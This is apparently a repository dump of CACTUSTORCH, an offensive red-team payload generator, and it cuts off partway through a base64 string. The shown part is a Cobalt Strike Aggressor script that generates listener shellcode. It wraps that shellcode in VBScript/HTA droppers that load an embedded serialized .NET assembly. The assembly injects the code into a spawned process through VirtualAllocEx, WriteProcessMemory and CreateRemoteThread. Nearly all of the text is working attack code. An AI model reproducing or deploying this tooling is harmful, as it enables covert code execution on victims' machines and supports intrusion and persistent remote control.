├── CACTUSTORCH.cna
├── CACTUSTORCH.cs
└── TestClass.cs
├── CACTUSTORCH.hta
├── CACTUSTORCH.js
├── CACTUSTORCH.jse
├── CACTUSTORCH.vba
├── CACTUSTORCH.vbe
├── CACTUSTORCH.vbs
├── README.md
├── banner.txt
└── splitvba.py
/CACTUSTORCH.cna:
--------------------------------------------------------------------------------
1 | # Host Payload (Stageless JavaScript / VBScript)
2 | #
3 | # Author: Vincent Yiu (@vysecurity)
4 | # Credits to @armitagehacker for the original script
5 |
6 | # setup our stageless PowerShell Web Delivery attack
7 | sub setup_attack {
8 | local('%options $script $url $payload');
9 | %options = $3;
10 |
11 | # Stageless variable = %options["stageless"];
12 | # Type variable = %options["type"]
13 |
14 | # Generate a raw powershell payload depending on type
15 |
16 | if (%options["stageless"] eq "true"){
17 | # Generate stageless payload
18 | artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
19 | yield;
20 | $payload = $1;
21 | }
22 | else{
23 | # Generate staged payload
24 | $payload = shellcode(%options["listener"], "true", "x86");
25 | }
26 |
27 | # $payload now has my shellcode in raw
28 |
29 | $b64payload = base64_encode($payload);
30 |
31 | # Now it's base64 encoded
32 | $data = "";
33 |
34 | if ((%options["type"] eq "VBScript") || (%options["type"] eq "HTA")){
35 | # Did they select VBScript?
36 | # VBScript it is!
37 | $data = $data . "Dim binary : binary = \"" . %options["binary"] . "\"\r\n";
38 | $data = $data . "Dim code : code = \"";
39 | $data = $data . $b64payload . "\"\r\n";
40 |
41 | # variables set at this point
42 |
43 | $data = $data . "Sub Debug(s)\r\n";
44 | $data = $data . "End Sub\r\n";
45 | $data = $data . "Sub SetVersion\r\n";
46 | $data = $data . "End Sub\r\n";
47 | $data = $data . "Function Base64ToStream(b)\r\n";
48 | $data = $data . " Dim enc, length, ba, transform, ms\r\n";
49 | $data = $data . " Set enc = CreateObject(\"System.Text.ASCIIEncoding\")\r\n";
50 | $data = $data . " length = enc.GetByteCount_2(b)\r\n";
51 | $data = $data . " Set transform = CreateObject(\"System.Security.Cryptography.FromBase64Transform\")\r\n";
52 | $data = $data . " Set ms = CreateObject(\"System.IO.MemoryStream\")\r\n";
53 | $data = $data . " ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3)\r\n";
54 | $data = $data . " ms.Position = 0\r\n";
55 | $data = $data . " Set Base64ToStream = ms\r\n";
56 | $data = $data . "End Function\r\n";
57 | $data = $data . "Sub Run\r\n";
58 | $data = $data . "Dim s, entry_class\r\n";
59 | $data = $data . "s = \"AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy\"\r\n";
60 | $data = $data . "s = s & \"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph\"\r\n";
61 | $data = $data . "s = s & \"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk\"\r\n";
62 | $data = $data . "s = s & \"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD\"\r\n";
63 | $data = $data . "s = s & \"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl\"\r\n";
64 | $data = $data . "s = s & \"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU\"\r\n";
65 | $data = $data . "s = s & \"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl\"\r\n";
66 | $data = $data . "s = s & \"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90\"\r\n";
67 | $data = $data . "s = s & \"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu\"\r\n";
68 | $data = $data . "s = s & \"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH\"\r\n";
69 | $data = $data . "s = s & \"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA\"\r\n";
70 | $data = $data . "s = s & \"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw\"\r\n";
71 | $data = $data . "s = s & \"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu\"\r\n";
72 | $data = $data . "s = s & \"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA\"\r\n";
73 | $data = $data . "s = s & \"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u\"\r\n";
74 | $data = $data . "s = s & \"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5\"\r\n";
75 | $data = $data . "s = s & \"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR\"\r\n";
76 | $data = $data . "s = s & \"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA\"\r\n";
77 | $data = $data . "s = s & \"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y\"\r\n";
78 | $data = $data . "s = s & \"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh\"\r\n";
79 | $data = $data . "s = s & \"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz\"\r\n";
80 | $data = $data . "s = s & \"ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA\"\r\n";
81 | $data = $data . "s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy\"\r\n";
82 | $data = $data . "s = s & \"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAkNhXWQAAAAAA\"\r\n";
83 | $data = $data . "s = s & \"AAAA4AAiIAsBMAAAFgAAAAYAAAAAAAByNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA\"\r\n";
84 | $data = $data . "s = s & \"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAIDUA\"\r\n";
85 | $data = $data . "s = s & \"AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n";
86 | $data = $data . "s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA\"\r\n";
87 | $data = $data . "s = s & \"AAAALnRleHQAAAB4FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA\"\r\n";
88 | $data = $data . "s = s & \"AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA\"\r\n";
89 | $data = $data . "s = s & \"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAFQ1AAAAAAAASAAAAAIABQD4IQAAKBMAAAEAAAAAAAAA\"\r\n";
90 | $data = $data . "s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT\"\r\n";
91 | $data = $data . "s = s & \"MAoABwEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMJAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA\"\r\n";
92 | $data = $data . "s = s & \"Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME\"\r\n";
93 | $data = $data . "s = s & \"EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAosbhEFFnMRAAAK\"\r\n";
94 | $data = $data . "s = s & \"ByAAMAAAH0AoAgAABhMGEgYoFgAACnJXAABwKBgAAAosChEFFigEAAAGJioWEwcSCAaOaSgRAAAK\"\r\n";
95 | $data = $data . "s = s & \"EQURBgYRCBEHKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMRAAAKKAUAAAYmKnoCfhUAAAp9AgAA\"\r\n";
96 | $data = $data . "s = s & \"BAIoDwAACgICKBkAAAp9AQAABCoAABMwAgBgAAAAAAAAAAJ+FQAACn0rAAAEAn4VAAAKfSwAAAQC\"\r\n";
97 | $data = $data . "s = s & \"fhUAAAp9LQAABAJ+FQAACn04AAAEAn4VAAAKfTkAAAQCfhUAAAp9OgAABAJ+FQAACn07AAAEAigP\"\r\n";
98 | $data = $data . "s = s & \"AAAKAgIoGQAACn0qAAAEKkJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAACgHAAAj\"\r\n";
99 | $data = $data . "s = s & \"fgAAlAcAAEwJAAAjU3RyaW5ncwAAAADgEAAAXAAAACNVUwA8EQAAEAAAACNHVUlEAAAATBEAANwB\"\r\n";
100 | $data = $data . "s = s & \"AAAjQmxvYgAAAAAAAAACAAABVx0CFAkCAAAA+gEzABYAAAEAAAAXAAAACQAAAFAAAAAJAAAAHwAA\"\r\n";
101 | $data = $data . "s = s & \"ABkAAAAzAAAAEgAAAAEAAAABAAAABQAAAAEAAAABAAAABwAAAAAAmQYBAAAAAAAGAFwFkgcGAMkF\"\r\n";
102 | $data = $data . "s = s & \"kgcGAIoEYAcPALIHAAAGALIE4QYGADAF4QYGABEF4QYGALAF4QYGAHwF4QYGAJUF4QYGAMkE4QYG\"\r\n";
103 | $data = $data . "s = s & \"AJ4EcwcGAHwEcwcGAPQE4QYGAKsIqQYGAGEEqQYGAE0FqQYGALAGqQYGAMoIqQYGAFkHqQYGAL4I\"\r\n";
104 | $data = $data . "s = s & \"qQYGAGYGqQYGAIQGcwcAAAAAJQAAAAAAAQABAAEAEABtBgAAPQABAAEACgAQAPgHAAA9AAEACAAK\"\r\n";
105 | $data = $data . "s = s & \"ARAAzgYAAEEABAAJAAIBAAAbCAAASQAIAAkAAgEAADYIAABJACcACQAKABAABgcAAD0AKgAJAAIB\"\r\n";
106 | $data = $data . "s = s & \"AABtBAAASQA8AAoAAgEAAPMGAABJAEUACgAGAH0G+gAGAEQHPwAGACQE/QAGAHQIPwAGAOcDPwAG\"\r\n";
107 | $data = $data . "s = s & \"AMgD+gAGAL0D+gAGBp4DAAFWgLICAwFWgMACAwFWgGQAAwFWgIgCAwFWgMIAAwFWgFMCAwFWgPEB\"\r\n";
108 | $data = $data . "s = s & \"AwFWgB0CAwFWgAUCAwFWgKABAwFWgAIDAwFWgF4BAwFWgEgBAwFWgOEBAwFWgE0CAwFWgDECAwFW\"\r\n";
109 | $data = $data . "s = s & \"gGoDAwFWgIIDAwFWgJkCAwFWgB0DAwFWgHYBAwFWgHUAAwFWgD0AAwFWgCcBAwFWgKgAAwFWgDoD\"\r\n";
110 | $data = $data . "s = s & \"AwFWgLkBAwFWgBgBAwFWgMYBAwFWgOUCAwEGBp4DAAFWgJEABwFWgHICBwEGAKYD+gAGAO8DPwAG\"\r\n";
111 | $data = $data . "s = s & \"ABcHPwAGADMEPwAGAEsD+gAGAJoD+gAGAOcF+gAGAO8F+gAGAEcI+gAGAFUI+gAGAOQE+gAGAC4I\"\r\n";
112 | $data = $data . "s = s & \"+gAGAOcICwEGAA0ACwEGABkAPwAGANIIPwAGANwIPwAGADQHPwAGBp4DAAFWgN4CDgFWgO8ADgFW\"\r\n";
113 | $data = $data . "s = s & \"gJ0BDgFWgNgCDgFWgNUBDgFWgA8BDgFWgJQBDgFWgAMBDgEGBp4DAAFWgOcAEgFWgFcAEgFWgNUA\"\r\n";
114 | $data = $data . "s = s & \"EgFWgFgDEgFWgGkCEgFWgE8DEgFWgN0AEgFWgGADEgFWgBEGEgFWgCQGEgFWgDkGEgEAAAAAgACW\"\r\n";
115 | $data = $data . "s = s & \"IC4AFgEBAAAAAACAAJYg8wgqAQsAAAAAAIAAliAJCTUBEAAAAAAAgACWIGMIPwEVAAAAAACAAJEg\"\r\n";
116 | $data = $data . "s = s & \"1ANFARcAUCAAAAAAhhg+BwYAHgBYIAAAAACGAE0EUAEeAGshAAAAAIYYPgcGACAAjCEAAAAAhhg+\"\r\n";
117 | $data = $data . "s = s & \"BwYAIAAAAAEAOwQAAAIAUwQAAAMA5AcAAAQA0QcAAAUAwQcAAAYACwgAAAcAvAgAAAgAHAkBAAkA\"\r\n";
118 | $data = $data . "s = s & \"BAcCAAoAzAYAAAEAGwQAAAIAiwgAAAMAAwYAAAQAawQAAAUAsggAAAEAdAgAAAIAfQgAAAMAIQcA\"\r\n";
119 | $data = $data . "s = s & \"AAQAAwYAAAUAtQYAAAEAdAgAAAIA+gMAAAEAdAgAAAIA0QcAAAMA9wUAAAQAlQgAAAUAKAcAAAYA\"\r\n";
120 | $data = $data . "s = s & \"CwgAAAcAsgMAAAEAAgkAAAIAAQAJAD4HAQARAD4HBgAZAD4HCgApAD4HEAAxAD4HEAA5AD4HEABB\"\r\n";
121 | $data = $data . "s = s & \"AD4HEABJAD4HEABRAD4HEABZAD4HEABhAD4HFQBpAD4HEABxAD4HEACJAD4HBgB5AD4HBgCZAFMG\"\r\n";
122 | $data = $data . "s = s & \"KQChAD4HAQCpAAQELwCxAHkGNACxAKQIOAChABIHPwChAGQGQgCxADsJRgCxAC8JRgC5AAoGTAAJ\"\r\n";
123 | $data = $data . "s = s & \"ACQAWgAJACgAXwAJACwAZAAJADAAaQAJADQAbgAJADgAcwAJADwAeAAJAEAAfQAJAEQAggAJAEgA\"\r\n";
124 | $data = $data . "s = s & \"hwAJAEwAjAAJAFAAkQAJAFQAlgAJAFgAmwAJAFwAoAAJAGAApQAJAGQAqgAJAGgArwAJAGwAtAAJ\"\r\n";
125 | $data = $data . "s = s & \"AHAAuQAJAHQAvgAJAHgAwwAJAHwAyAAJAIAAzQAJAIQA0gAJAIgA1wAJAIwA3AAJAJAA4QAJAJQA\"\r\n";
126 | $data = $data . "s = s & \"5gAJAJgA6wAJAKAAWgAJAKQAXwAJAPQAlgAJAPgAmwAJAPwA8AAJAAABuQAJAAQB4QAJAAgB9QAJ\"\r\n";
127 | $data = $data . "s = s & \"AAwBvgAJABABwwAJABgBbgAJABwBcwAJACABeAAJACQBfQAJACgBWgAJACwBXwAJADABZAAJADQB\"\r\n";
128 | $data = $data . "s = s & \"aQAJADgBggAJADwBhwAJAEABjAAuAAsAVgEuABMAXwEuABsAfgEuACMAhwEuACsAhwEuADMAmAEu\"\r\n";
129 | $data = $data . "s = s & \"ADsAmAEuAEMAhwEuAEsAhwEuAFMAmAEuAFsAngEuAGMApAEuAGsAzgFDAFsAngGjAHMAWgDDAHMA\"\r\n";
130 | $data = $data . "s = s & \"WgADAXMAWgAjAXMAWgAaAIwGAAEDAC4AAQAAAQUA8wgBAAABBwAJCQEAAAEJAGMIAQAAAQsA1AMB\"\r\n";
131 | $data = $data . "s = s & \"AASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAAAAMAAgAEAAIABQACAAYA\"\r\n";
132 | $data = $data . "s = s & \"AgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQyAGxwUmVzZXJ2ZWQyADxN\"\r\n";
133 | $data = $data . "s = s & \"b2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJPTV9KT0IARVhFQ1VURV9S\"\r\n";
134 | $data = $data . "s = s & \"RUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9VTkRfRU5EAERVUExJQ0FU\"\r\n";
135 | $data = $data . "s = s & \"RV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBDUkVBVEVfTkVXX0NPTlNP\"\r\n";
136 | $data = $data . "s = s & \"TEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RVU1RPUkNIAFdSSVRFX1dB\"\r\n";
137 | $data = $data . "s = s & \"VENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJWRV9DT0RFX0FVVEhaX0xF\"\r\n";
138 | $data = $data . "s = s & \"VkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVfV09XX1ZETQBQUk9DRVNT\"\r\n";
139 | $data = $data . "s = s & \"X01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVfTkVXX1BST0NFU1NfR1JP\"\r\n";
140 | $data = $data . "s = s & \"VVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VTAENSRUFURV9GT1JDRURP\"\r\n";
141 | $data = $data . "s = s & \"UwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NMQVNTAEhJR0hfUFJJT1JJ\"\r\n";
142 | $data = $data . "s = s & \"VFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9XX05PUk1BTF9QUklPUklU\"\r\n";
143 | $data = $data . "s = s & \"WV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVUQUNIRURfUFJPQ0VTUwBD\"\r\n";
144 | $data = $data . "s = s & \"UkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJVR19PTkxZX1RISVNfUFJP\"\r\n";
145 | $data = $data . "s = s & \"Q0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVGQVVMVABDUkVBVEVfVU5J\"\r\n";
146 | $data = $data . "s = s & \"Q09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVTRU5UAENSRUFURV9OT19X\"\r\n";
147 | $data = $data . "s = s & \"SU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVSSVRfUEFSRU5UX0FGRklO\"\r\n";
148 | $data = $data . "s = s & \"SVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNiAG1zY29ybGliAGxwVGhy\"\r\n";
149 | $data = $data . "s = s & \"ZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVUaHJlYWQAaFRocmVhZABs\"\r\n";
150 | $data = $data . "s = s & \"cFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxlAGxwSGFuZGxlAGJJbmhl\"\r\n";
151 | $data = $data . "s = s & \"cml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUAbHBDb21tYW5kTGluZQBW\"\r\n";
152 | $data = $data . "s = s & \"YWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1\"\r\n";
153 | $data = $data . "s = s & \"dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJh\"\r\n";
154 | $data = $data . "s = s & \"ZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmli\"\r\n";
155 | $data = $data . "s = s & \"dXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0\"\r\n";
156 | $data = $data . "s = s & \"cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNz\"\r\n";
157 | $data = $data . "s = s & \"ZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5\"\r\n";
158 | $data = $data . "s = s & \"Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBkd1hTaXplAGR3\"\r\n";
159 | $data = $data . "s = s & \"WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2RpZmllcmZsYWcATk9DQUNI\"\r\n";
160 | $data = $data . "s = s & \"RV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBGcm9tQmFzZTY0U3RyaW5n\"\r\n";
161 | $data = $data . "s = s & \"AFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABrZXJuZWwzMi5kbGwAQ0FD\"\r\n";
162 | $data = $data . "s = s & \"VFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dyaXR0ZW4AbHBQcm9jZXNz\"\r\n";
163 | $data = $data . "s = s & \"SW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBscFN0YXJ0dXBJ\"\r\n";
164 | $data = $data . "s = s & \"bmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3RkRXJyb3IALmN0b3IAbHBT\"\r\n";
165 | $data = $data . "s = s & \"ZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGlt\"\r\n";
166 | $data = $data . "s = s & \"ZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dp\"\r\n";
167 | $data = $data . "s = s & \"bmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAGxwUHJvY2Vzc0F0dHJp\"\r\n";
168 | $data = $data . "s = s & \"YnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBDcmVhdGVQcm9jZXNzRmxh\"\r\n";
169 | $data = $data . "s = s & \"Z3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMAZHdZQ291bnRDaGFycwBU\"\r\n";
170 | $data = $data . "s = s & \"ZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRB\"\r\n";
171 | $data = $data . "s = s & \"ZGRyZXNzAENvbmNhdABPYmplY3QAZmxQcm90ZWN0AGxwRW52aXJvbm1lbnQAQ29udmVydABoU3Rk\"\r\n";
172 | $data = $data . "s = s & \"SW5wdXQAaFN0ZE91dHB1dAB3U2hvd1dpbmRvdwBWaXJ0dWFsQWxsb2NFeABiaW5hcnkAV3JpdGVQ\"\r\n";
173 | $data = $data . "s = s & \"cm9jZXNzTWVtb3J5AGxwQ3VycmVudERpcmVjdG9yeQBvcF9FcXVhbGl0eQBvcF9JbmVxdWFsaXR5\"\r\n";
174 | $data = $data . "s = s & \"AAAAAAABABlQAHIAbwBnAHIAYQBtAFcANgA0ADMAMgAADXcAaQBuAGQAaQByAAAVXABTAHkAcwBX\"\r\n";
175 | $data = $data . "s = s & \"AE8AVwA2ADQAXAAAFVwAUwB5AHMAdABlAG0AMwAyAFwAAAMwAAAARY+bzuLqxE+aSSAzLsphXgAE\"\r\n";
176 | $data = $data . "s = s & \"IAEBCAMgAAEFIAEBEREEIAEBDgQgAQECDgcJHQUYEhwREA4YGAgYBQABHQUOBAABDg4DIAAIBgAD\"\r\n";
177 | $data = $data . "s = s & \"Dg4ODgIGGAMgAA4FAAICDg4EAAEIHAi3elxWGTTgiQQBAAAABAIAAAAEBAAAAAQIAAAABBAAAAAE\"\r\n";
178 | $data = $data . "s = s & \"IAAAAARAAAAABIAAAAAEAAEAAAQAAgAABAAEAAAEAAgAAAQAEAAABAAgAAAEAEAAAAQAgAAABAAA\"\r\n";
179 | $data = $data . "s = s & \"AQAEAAACAAQAAAQABAAACAAEAAAQAAQAACAABAAAAAEEAAAAAgQAAAAEBAAAAAgEAAAAEAQAAAAg\"\r\n";
180 | $data = $data . "s = s & \"BAAAAEAEAAAAgAQAMAAABAAAQAACBggCBgICBgkDBhEUAwYRGAIGBgMGESADBhEkEwAKGA4OEgwS\"\r\n";
181 | $data = $data . "s = s & \"DAIRFBgOEhwQERAKAAUYGBgYESARJAkABQIYGB0FGAgFAAICGAkKAAcYGBgJGBgJGAUgAgEODggB\"\r\n";
182 | $data = $data . "s = s & \"AAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAAQAQALQ0FDVFVT\"\r\n";
183 | $data = $data . "s = s & \"VE9SQ0gAAAUBAAAAAAUBAAEAACkBACQ1NjU5OGYxYy02ZDg4LTQ5OTQtYTM5Mi1hZjMzN2FiZTU3\"\r\n";
184 | $data = $data . "s = s & \"NzcAAAwBAAcxLjAuMC4wAAAASDUAAAAAAAAAAAAAYjUAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n";
185 | $data = $data . "s = s & \"AFQ1AAAAAAAAAAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAA\"\r\n";
186 | $data = $data . "s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n";
187 | $data = $data . "s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n";
188 | $data = $data . "s = s & \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA\"\r\n";
189 | $data = $data . "s = s & \"ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A\"\r\n";
190 | $data = $data . "s = s & \"VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA\"\r\n";
191 | $data = $data . "s = s & \"AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA\"\r\n";
192 | $data = $data . "s = s & \"BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs\"\r\n";
193 | $data = $data . "s = s & \"AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA\"\r\n";
194 | $data = $data . "s = s & \"cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA\"\r\n";
195 | $data = $data . "s = s & \"AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA\"\r\n";
196 | $data = $data . "s = s & \"UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu\"\r\n";
197 | $data = $data . "s = s & \"ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA\"\r\n";
198 | $data = $data . "s = s & \"SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV\"\r\n";
